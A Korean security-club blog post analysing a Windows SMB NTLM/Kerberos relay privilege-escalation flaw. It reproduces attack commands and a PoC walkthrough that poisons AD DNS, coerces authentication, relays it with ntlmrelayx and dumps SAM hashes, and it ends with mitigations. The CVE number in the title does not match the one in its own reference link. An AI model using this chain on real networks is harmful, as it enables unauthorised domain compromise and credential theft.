<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.2.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/swing_logo.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico">
  <link rel="mask-icon" href="/images/swing_logo.png" color="#222">
  <meta name="google-site-verification" content="uoL1t-yrbhPowL65E-xnG5D1FNLOwghJsIG6iqHrEsc">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css" integrity="sha256-wiz7ZSCn/btzhjKDQBms9Hx4sSeUYsDrTLg7roPstac=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"log.swuswing.com","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.19.2","exturl":true,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="SMB 프로토콜이란?SMB(Server Message Block)는 네트워크에서 파일과 프린터를 공유하기 위한 프로토콜이다. 클라이언트는 SMB를 통해 서버의 파일·디렉터리에 접근해 생성, 수정, 삭제 작업을 수행할 수 있으며, 프린터 공유도 가능하다. 만약 SMB 구현 또는 설정에 취약점이 존재하면, 같은 네트워크의 공격자가 트래픽을 가로채거나 인증을 중">
<meta property="og:type" content="article">
<meta property="og:title" content="Microsoft SMB 취약점 (CVE-2025-33703)">
<meta property="og:url" content="https://log.swuswing.com/2025/09/28/3210_250928/index.html">
<meta property="og:site_name" content="SW1NGL0G">
<meta property="og:description" content="SMB 프로토콜이란?SMB(Server Message Block)는 네트워크에서 파일과 프린터를 공유하기 위한 프로토콜이다. 클라이언트는 SMB를 통해 서버의 파일·디렉터리에 접근해 생성, 수정, 삭제 작업을 수행할 수 있으며, 프린터 공유도 가능하다. 만약 SMB 구현 또는 설정에 취약점이 존재하면, 같은 네트워크의 공격자가 트래픽을 가로채거나 인증을 중">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://log.swuswing.com/images/3210_250928_image1.png">
<meta property="og:image" content="https://log.swuswing.com/images/3210_250928_image2.png">
<meta property="og:image" content="https://log.swuswing.com/images/3210_250928_image3.png">
<meta property="article:published_time" content="2025-09-28T04:00:00.000Z">
<meta property="article:modified_time" content="2025-10-02T06:22:39.158Z">
<meta property="article:author" content="SWING">
<meta property="article:tag" content="1day">
<meta property="article:tag" content="Windows">
<meta property="article:tag" content="SMB">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://log.swuswing.com/images/3210_250928_image1.png">


<link rel="canonical" href="https://log.swuswing.com/2025/09/28/3210_250928/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://log.swuswing.com/2025/09/28/3210_250928/","path":"2025/09/28/3210_250928/","title":"Microsoft SMB 취약점 (CVE-2025-33703)"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>Microsoft SMB 취약점 (CVE-2025-33703) | SW1NGL0G</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">SW1NGL0G</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>







</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#About-CVE-2025-33703"><span class="nav-number">1.</span> <span class="nav-text">About CVE-2025-33703</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Root-Cause"><span class="nav-number">1.0.1.</span> <span class="nav-text">Root Cause</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Exploit"><span class="nav-number">1.0.2.</span> <span class="nav-text">Exploit</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%EC%A0%84%EC%B2%B4-%ED%9D%90%EB%A6%84-main"><span class="nav-number">1.0.3.</span> <span class="nav-text">전체 흐름(main)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#PoC-%EC%8B%A4%ED%96%89"><span class="nav-number">1.0.4.</span> <span class="nav-text">PoC 실행</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CVE-2025-33703-Review"><span class="nav-number">1.1.</span> <span class="nav-text">CVE-2025-33703 Review</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">SWING</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">27</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">54</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <span class="exturl" data-url="bWFpbHRvOnN3dS5zd2luZ0BnbWFpbC5jb20=" title="E-Mail → mailto:swu.swing@gmail.com"><i class="fa fa-envelope fa-fw"></i>E-Mail</span>
      </span>
      <span class="links-of-author-item">
        <span class="exturl" data-url="aHR0cHM6Ly93d3cuZmFjZWJvb2suY29tL0Bzd3Vzd2luZw==" title="FB Page → https:&#x2F;&#x2F;www.facebook.com&#x2F;@swuswing"><i class="fab fa-facebook fa-fw"></i>FB Page</span>
      </span>
      <span class="links-of-author-item">
        <span class="exturl" data-url="aHR0cHM6Ly93d3cuaW5zdGFncmFtLmNvbS9zd2luZ19zd3U=" title="Instagram → https:&#x2F;&#x2F;www.instagram.com&#x2F;swing_swu"><i class="fab fa-instagram fa-fw"></i>Instagram</span>
      </span>
  </div>

        </div>
      </div>
    </div>

    
    <div class="sidebar-inner sidebar-blogroll">
      <div class="links-of-blogroll animated">
        <div class="links-of-blogroll-title"><i class="fa fa-globe fa-fw"></i>
          Links
        </div>
        <ul class="links-of-blogroll-list">
            <li class="links-of-blogroll-item">
              <span class="exturl" data-url="aHR0cHM6Ly9zd3Vzd2luZy5jb20v" title="https:&#x2F;&#x2F;swuswing.com&#x2F;">SWING Official Website</span>
            </li>
        </ul>
      </div>
    </div>
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://log.swuswing.com/2025/09/28/3210_250928/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="SWING">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="SW1NGL0G">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="Microsoft SMB 취약점 (CVE-2025-33703) | SW1NGL0G">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Microsoft SMB 취약점 (CVE-2025-33703)
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="far fa-user"></i>
    </span>
    <span class="post-meta-item-text">author: banda</span>
  </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2025-09-28 13:00:00" itemprop="dateCreated datePublished" datetime="2025-09-28T13:00:00+09:00">2025-09-28</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/2025-SWING-hackingcamp/" itemprop="url" rel="index"><span itemprop="name">2025 SWING hackingcamp</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p><strong>SMB 프로토콜이란?</strong><br>SMB(Server Message Block)는 네트워크에서 파일과 프린터를 공유하기 위한 프로토콜이다. 클라이언트는 SMB를 통해 서버의 파일·디렉터리에 접근해 생성, 수정, 삭제 작업을 수행할 수 있으며, 프린터 공유도 가능하다. 만약 SMB 구현 또는 설정에 취약점이 존재하면, 같은 네트워크의 공격자가 트래픽을 가로채거나 인증을 중계(relay)하여 관리자 권한을 획득할 수 있다.</p>
<span id="more"></span>

<h1 id="About-CVE-2025-33703"><a href="#About-CVE-2025-33703" class="headerlink" title="About CVE-2025-33703"></a>About CVE-2025-33703</h1><p><img src="/images/3210_250928_image1.png"></p>
<p>CVE-2025-33703은 Windows SMB 서버에 영향을 주는 권한 상승 취약점으로, NTLM 릴레이 공격이 핵심 트리거다. 취약점의 기술적 배경은 다음과 같다.</p>
<ul>
<li><strong>NTLM 프로토콜의 한계</strong></li>
</ul>
<p>NTLM은 챌린지–응답 방식으로 동작하지만, 인증 세션이 특정 서비스&#x2F;서버에 강하게 결합되어 있지 않다. 이로 인해 공격자는 중간에서 인증 메시지를 가로채 다른 서비스로 재전송(relay 또는 reflection)할 수 있다.</p>
<ul>
<li><strong>SMB 서명</strong></li>
</ul>
<p>SMB 통신 무결성을 보장하는 기능이다. 서버가 서명 검증을 강제하면 공격자가 메시지를 중계하더라도 서명 불일치로 연결이 거부된다. 반대로 서명 강제가 비활성화되어 있으면 릴레이가 가능해질 수 있다.</p>
<ul>
<li><strong>EPA(확장된 인증 보호)</strong></li>
</ul>
<p>인증을 특정 서비스 채널과 SPN(Service Principal Name)에 바인딩하여 릴레이를 어렵게 만드는 보호 기능이다. EPA가 활성화되면, 가로챈 토큰을 다른 서비스에 재사용하기가 훨씬 힘들어진다.</p>
<ul>
<li><strong>인증 강제(Coercion) 기법</strong></li>
</ul>
<p>공격자는 PrinterBug, PetitPotam 등은 피해 호스트가 의도치 않게 NTLM 인증을 수행하도록 유도한다. 이때 생성된 인증 트래픽이 공격자에게 유출될 수 있다.</p>
<h3 id="Root-Cause"><a href="#Root-Cause" class="headerlink" title="Root Cause"></a>Root Cause</h3><p>취약점은 서버 측에서 SMB 서명 또는 EPA가 강제되지 않을 경우, 공격자가 NTLM 인증 정보를 가로채 다른 서비스로 재사용(relay)할 수 있는 설정 취약성이 발생한다.</p>
<p><img src="/images/3210_250928_image2.png"></p>
<p>단계별로 나타나는 취약한 흐름과 공격 예시를 확인해보면 아래와 같다.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 인증 강제</span></span><br><span class="line">$ wspcoerce <span class="string">&#x27;lab.redteam/user1:Password@client1.lab.redteam&#x27;</span> \</span><br><span class="line">    file:////client11UWhRCAAAA...YBAAAA/path</span><br><span class="line"></span><br><span class="line"><span class="comment"># DNS/이름 해석 스푸핑으로 인증 방향 전환</span></span><br><span class="line">$ sudo pretender -i eth1 --no-dhcp-dns --no-timestamps \</span><br><span class="line">    --spoof <span class="string">&#x27;*1UWhRCAAAA...YBAAAA*&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Kerberos 티켓 릴레이 후 명령 실행</span></span><br><span class="line">$ krbrelayx.py --target smb://client1.lab.redteam -c whoam</span><br></pre></td></tr></table></figure>

<ol>
<li>공격자는 wspcoerce나 NetExec과 같은 도구로 피해 호스트가 공격자 제어 SMB 서버로 인증하도록 강제한다. 보통 RPC API를 악용해 원격 SMB 연결을 유도한다.</li>
<li>공격자가 특수하게 만든 호스트 이름을 AD DNS에 등록하거나 pretender 등으로 로컬 이름 해석을 속이면, Kerberos 티켓이 공격자의 시스템을 피해자 호스트로 오인하도록 만들 수 있다.</li>
<li>이후 Kerberos 서비스 티켓을 캡처한 뒤, 수정된 krbrelayx.py로 원래 호스트에 티켓을 전송해 cifs&#x2F;client1 SPN에 대해 컴퓨터 계정(client1$)으로 인증되게 한다.</li>
<li>그 결과 낮은 권한 세션이 아닌 시스템 수준 접근으로 이어져 권한 상승이 가능해진다.</li>
</ol>
<h3 id="Exploit"><a href="#Exploit" class="headerlink" title="Exploit"></a>Exploit</h3><p>Exploit PoC를 통해 CVE-2025-33703를 분석해보자. PoC 체인은 AD 환경에서 다음 순서로 이뤄진다. PoC 동작 순서는  AD DNS 레코드 추가 → DNS 전파 확인 → ntlmrelayx 리스너 기동 → PetitPotam&#x2F;Printerbug&#x2F;DFSCoerce로 강제 인증 유도 → 유입된 NTLM 인증을 타깃에 릴레이하며 결과적으로 권한 상승을 수행할 수 있게 된다.</p>
<p>전체 코드는 <span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL212ZXJzY2h1L0NWRS0yMDI1LTMzMDczP3RhYj1yZWFkbWUtb3YtZmlsZQ==">reference</span>를 통해서 확인할 수 있다.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">STATIC_DNS_RECORD = <span class="string">&quot;localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA&quot;</span></span><br></pre></td></tr></table></figure>

<p>AD DNS 존에 추가할 A 레코드의 호스트명을 지정한다. 이후 강제 인증이 이 이름으로 향하도록 유도한다.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">parser = argparse.ArgumentParser(...)</span><br><span class="line">parser.add_argument(<span class="string">&quot;-u&quot;</span>, <span class="string">&quot;--username&quot;</span>, required=<span class="literal">True</span>)   <span class="comment"># DOMAIN\user</span></span><br><span class="line">parser.add_argument(<span class="string">&quot;-p&quot;</span>, <span class="string">&quot;--password&quot;</span>, required=<span class="literal">True</span>)</span><br><span class="line">parser.add_argument(<span class="string">&quot;-d&quot;</span>, <span class="string">&quot;--attacker-ip&quot;</span>, required=<span class="literal">True</span>)</span><br><span class="line">parser.add_argument(<span class="string">&quot;--dns-ip&quot;</span>, required=<span class="literal">True</span>)           <span class="comment"># DC의 DNS IP</span></span><br><span class="line">parser.add_argument(<span class="string">&quot;--dc-fqdn&quot;</span>, required=<span class="literal">True</span>)          <span class="comment"># DC FQDN</span></span><br><span class="line">parser.add_argument(<span class="string">&quot;--target&quot;</span>, required=<span class="literal">True</span>)           <span class="comment"># 릴레이 타깃(FQDN)</span></span><br><span class="line">parser.add_argument(<span class="string">&quot;--target-ip&quot;</span>, required=<span class="literal">True</span>)        <span class="comment"># 코어싱 대상 IP</span></span><br><span class="line">parser.add_argument(<span class="string">&quot;--cli-only&quot;</span>, action=<span class="string">&quot;store_true&quot;</span>)</span><br><span class="line">parser.add_argument(<span class="string">&quot;--custom-command&quot;</span>)</span><br><span class="line">parser.add_argument(<span class="string">&quot;--socks&quot;</span>, action=<span class="string">&quot;store_true&quot;</span>)</span><br><span class="line">parser.add_argument(<span class="string">&quot;-M&quot;</span>, <span class="string">&quot;--method&quot;</span>, default=<span class="string">&quot;PetitPotam&quot;</span>,</span><br><span class="line">                    choices=[<span class="string">&quot;PetitPotam&quot;</span>, <span class="string">&quot;Printerbug&quot;</span>, <span class="string">&quot;DFSCoerce&quot;</span>])</span><br></pre></td></tr></table></figure>

<p>Chain을 연결하는 데에 필요한 Active Directory DNS 타겟&#x2F; 파라미터를 CLI에서 받아온다.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">run_dnstool</span>(<span class="params">user, password, attacker_ip, dns_ip, dc_fqdn</span>):</span><br><span class="line">    dnstool_cmd = [</span><br><span class="line">        <span class="string">&quot;python3&quot;</span>, <span class="string">&quot;dnstool.py&quot;</span>,</span><br><span class="line">        <span class="string">&quot;-u&quot;</span>, user,</span><br><span class="line">        <span class="string">&quot;-p&quot;</span>, password,</span><br><span class="line">        <span class="string">&quot;-a&quot;</span>, <span class="string">&quot;add&quot;</span>,</span><br><span class="line">        <span class="string">&quot;-r&quot;</span>, STATIC_DNS_RECORD,</span><br><span class="line">        <span class="string">&quot;-d&quot;</span>, attacker_ip,</span><br><span class="line">        <span class="string">&quot;-dns-ip&quot;</span>, dns_ip,</span><br><span class="line">        dc_fqdn</span><br><span class="line">    ]</span><br><span class="line">    subprocess.run(dnstool_cmd, check=<span class="literal">True</span>)</span><br></pre></td></tr></table></figure>

<p>이후 Impacket의 dnstool.py를 호출해 AD DNS에 A 레코드를 추가한다. -r은 호스트명, -d는 해당 호스트명이 가리킬 공격자 IP다. 이는 내부에서 <code>\\hostname</code> 접근 시 공격자 IP로 해석되도록 만드는 ADIDNS 남용 준비 단계다.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">wait_for_dns_record</span>(<span class="params">record, dns_ip, timeout=<span class="number">60</span></span>):</span><br><span class="line">    start_time = time.time()</span><br><span class="line">    <span class="keyword">while</span> time.time() - start_time &lt; timeout:</span><br><span class="line">        result = subprocess.run(</span><br><span class="line">            [<span class="string">&quot;dig&quot;</span>, <span class="string">&quot;+short&quot;</span>, record, <span class="string">f&quot;@<span class="subst">&#123;dns_ip&#125;</span>&quot;</span>],</span><br><span class="line">            capture_output=<span class="literal">True</span>, text=<span class="literal">True</span></span><br><span class="line">        )</span><br><span class="line">        <span class="keyword">if</span> result.stdout.strip():</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line">        time.sleep(<span class="number">2</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">False</span></span><br></pre></td></tr></table></figure>

<p>이후 방금 등록한 FQDN이 DC DNS에서 응답되는지 dig로 폴링해 전파 여부를 확인한다. 이 단계가 성공해야 이후 코어싱으로 유도된 인증이 정확히 공격자 IP로 향한다.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">start_ntlmrelayx</span>(<span class="params">target, cli_only=<span class="literal">False</span>, custom_command=<span class="literal">None</span>, socks=<span class="literal">False</span></span>):</span><br><span class="line">    <span class="keyword">if</span> cli_only:</span><br><span class="line">        <span class="keyword">if</span> custom_command:</span><br><span class="line">            cmd = [<span class="string">&quot;impacket-ntlmrelayx&quot;</span>, <span class="string">&quot;-t&quot;</span>, target, <span class="string">&quot;-smb2support&quot;</span>, <span class="string">&quot;-c&quot;</span>, custom_command]</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            cmd = [<span class="string">&quot;impacket-ntlmrelayx&quot;</span>, <span class="string">&quot;-t&quot;</span>, target, <span class="string">&quot;-smb2support&quot;</span>]</span><br><span class="line">        <span class="keyword">if</span> socks:</span><br><span class="line">            cmd.append(<span class="string">&quot;-socks&quot;</span>)</span><br><span class="line">        <span class="keyword">return</span> subprocess.Popen(cmd)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">if</span> custom_command:</span><br><span class="line">            cmd = [<span class="string">&quot;xterm&quot;</span>, <span class="string">&quot;-hold&quot;</span>, <span class="string">&quot;-e&quot;</span>, <span class="string">&quot;impacket-ntlmrelayx&quot;</span>, <span class="string">&quot;-t&quot;</span>, target, <span class="string">&quot;-smb2support&quot;</span>, <span class="string">&quot;-c&quot;</span>, custom_command]</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            cmd = [<span class="string">&quot;xterm&quot;</span>, <span class="string">&quot;-hold&quot;</span>, <span class="string">&quot;-e&quot;</span>, <span class="string">&quot;impacket-ntlmrelayx&quot;</span>, <span class="string">&quot;-t&quot;</span>, target, <span class="string">&quot;-smb2support&quot;</span>]</span><br><span class="line">        <span class="keyword">if</span> socks:</span><br><span class="line">            cmd.append(<span class="string">&quot;--socks&quot;</span>)</span><br><span class="line">        <span class="keyword">return</span> subprocess.Popen(cmd)</span><br></pre></td></tr></table></figure>

<p>ntlmrelayx를 실행해 지정된 타깃 서비스에 대한 릴레이를 대기한다. SMB 서명 미강제 등 취약한 설정일 때 릴레이가 성공한다. -c가 있으면 성공 후 원격 명령을 실행할 수 있고, socks를 사용하면 피벗 프록시로도 활용 가능하다.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">run_petitpotam</span>(<span class="params">target_ip, domain, user, password, cli_only=<span class="literal">False</span>, method=<span class="string">&quot;PetitPotam&quot;</span></span>):</span><br><span class="line">    command_str = (</span><br><span class="line">        <span class="string">f&quot;nxc smb <span class="subst">&#123;target_ip&#125;</span> &quot;</span></span><br><span class="line">        <span class="string">f&quot;-d <span class="subst">&#123;domain&#125;</span> &quot;</span></span><br><span class="line">        <span class="string">f&quot;-u <span class="subst">&#123;user&#125;</span> &quot;</span></span><br><span class="line">        <span class="string">f&quot;-p &#x27;<span class="subst">&#123;password&#125;</span>&#x27; &quot;</span></span><br><span class="line">        <span class="string">f&quot;-M coerce_plus &quot;</span></span><br><span class="line">        <span class="string">f&quot;-o M=<span class="subst">&#123;method&#125;</span> L=\&quot;<span class="subst">&#123;STATIC_DNS_RECORD&#125;</span>\&quot;&quot;</span></span><br><span class="line">    )</span><br><span class="line">    <span class="keyword">if</span> cli_only:</span><br><span class="line">        subprocess.Popen(command_str, shell=<span class="literal">True</span>,</span><br><span class="line">                         stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        subprocess.Popen([<span class="string">&quot;xterm&quot;</span>, <span class="string">&quot;-e&quot;</span>, <span class="string">&quot;bash&quot;</span>, <span class="string">&quot;-c&quot;</span>, command_str])</span><br></pre></td></tr></table></figure>

<p>최종적으로 NetExec의 coerce_plus 모듈로 코어싱을 트리거한다. L 인자에 앞서 등록한 호스트명을 넣어 피해 호스트가 <code>\\hostname</code>으로 SMB 인증을 시도하게 만들고, 내부 DNS가 공격자 IP를 반환하도록 한다. 그 결과 NTLM 인증이 공격자에게 유입되며 ntlmrelayx가 이를 타깃으로 릴레이한다.</p>
<hr>
<h3 id="전체-흐름-main"><a href="#전체-흐름-main" class="headerlink" title="전체 흐름(main)"></a>전체 흐름(main)</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 1) DNS 레코드 추가</span></span><br><span class="line">run_dnstool(args.username, args.password, args.attacker_ip, args.dns_ip, args.dc_fqdn)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 2) 전파 확인 (도메인 추출해 FQDN 구성)</span></span><br><span class="line">domain_name = <span class="string">&quot;.&quot;</span>.join(args.dc_fqdn.split(<span class="string">&quot;.&quot;</span>)[<span class="number">1</span>:])</span><br><span class="line">full_record = <span class="string">f&quot;<span class="subst">&#123;STATIC_DNS_RECORD&#125;</span>.<span class="subst">&#123;domain_name&#125;</span>&quot;</span></span><br><span class="line"><span class="keyword">if</span> <span class="keyword">not</span> wait_for_dns_record(full_record, args.dns_ip, timeout=<span class="number">60</span>):</span><br><span class="line">    sys.exit(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 3) ntlmrelayx 시작</span></span><br><span class="line">ntlmrelay_proc = start_ntlmrelayx(args.target, args.cli_only, args.custom_command, args.socks)</span><br><span class="line">time.sleep(<span class="number">5</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 4) 코어싱 실행</span></span><br><span class="line">domain, user = args.username.split(<span class="string">&quot;\\&quot;</span>, <span class="number">1</span>)</span><br><span class="line">run_petitpotam(args.target_ip, domain, user, args.password, args.cli_only, args.method)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>즉, 요약하면, 코어싱 전에 DNS가 공격자 IP를 가리키도록 준비하고, 인증이 발생하자마자 ntlmrelayx가 이를 받아 타깃 서비스로 릴레이하게 된다.</p>
<h3 id="PoC-실행"><a href="#PoC-실행" class="headerlink" title="PoC 실행"></a>PoC 실행</h3><p><img src="/images/3210_250928_image3.png"></p>
<p>dnstool로 AD DNS A 레코드가 추가되고 dig로 전파가 확인된다. 이어 ntlmrelayx 리스너가 실행되고, NetExec coerce_plus로 PetitPotam 코어싱이 트리거된다. ntlmrelayx 로그에는 CLIENT01로부터 인증을 수신한 뒤 RemoteRegistry를 시작하고 SAM 해시를 덤프하는 과정이 나타난다.</p>
<hr>
<h2 id="CVE-2025-33703-Review"><a href="#CVE-2025-33703-Review" class="headerlink" title="CVE-2025-33703 Review"></a>CVE-2025-33703 Review</h2><p>해당 취약점은 Microsoft의 2025년 6월 보안 업데이트를 통해 패치되었다고 알려져 있다. 해당 취약점의 악용을 방지하기 위해 아래와 같은 보안 조치를 권장한다.</p>
<ul>
<li>모든 Windows 호스트에서 SMB 서명 강제</li>
<li>비정상 SMB 연결 시도 및 릴레이 지표 모니터링</li>
<li>AD DNS에서 의심스러운 호스트명(이상한 레이블) 상시 점검</li>
<li>가능하면 NTLM 사용 최소화 및 EPA 활성화</li>
</ul>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/1day/" rel="tag"># 1day</a>
              <a href="/tags/Windows/" rel="tag"># Windows</a>
              <a href="/tags/SMB/" rel="tag"># SMB</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/09/25/323303_250925/" rel="prev" title="[사이버 탐험 : 보안의 첫걸음] OWASP Juice-Shop을 통해 알아보는 SQL Injection">
                  <i class="fa fa-angle-left"></i> [사이버 탐험 : 보안의 첫걸음] OWASP Juice-Shop을 통해 알아보는 SQL Injection
                </a>
            </div>
            <div class="post-nav-item">
